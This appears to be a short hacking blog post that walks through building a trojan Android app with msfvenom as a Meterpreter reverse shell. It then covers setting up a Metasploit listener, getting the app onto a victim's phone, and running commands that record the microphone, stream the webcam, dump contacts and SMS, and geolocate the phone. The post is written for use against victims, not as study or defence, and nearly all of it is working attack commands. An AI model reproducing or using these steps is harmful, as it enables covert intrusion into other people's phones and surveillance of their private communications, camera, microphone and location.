How to hack mobile in wifi?

Procedure:

Step 1: Fire-Up Kali:

·         Open a terminal, and make a Trojan .apk
·         we can do this by typing :
msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R > FILENAME.apk
 -p => Specify Payload
 LHOST => Your  IP or DDNS
 LPORT => Port You want to listen on
 R => Means RAW Format
 >/root/FILENAME.apk => Location for File



Step 2: Open Another Terminal:
·         Open another terminal until the file is being produced.
·         Load metasploit console, by typing : msfconsole



Step 3: Set-Up a Listener:

·         After it loads, load the multi-handler exploit by typing : use exploit/multi/handler
·         Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
·         To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!
·         At last type: exploit to start the listener.
·         Copy the application that you made (deepak.apk) from the root folder, to you android phone

Whenever the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established and you will get a Screen After that you can use the following command:
record_mic
webcam_snap
webcam_stream
dump_contacts
dump_sms
geolocate
By executing web_stream we will be able to see from their camera

That’s it mobile is hacked successfully.

Comments

Popular posts from this blog

How to HACK the PATTERN LOCK of the ANDROID PHONES ?

HACK ADMIN PASSWORD THROUGH GUEST ACCOUNT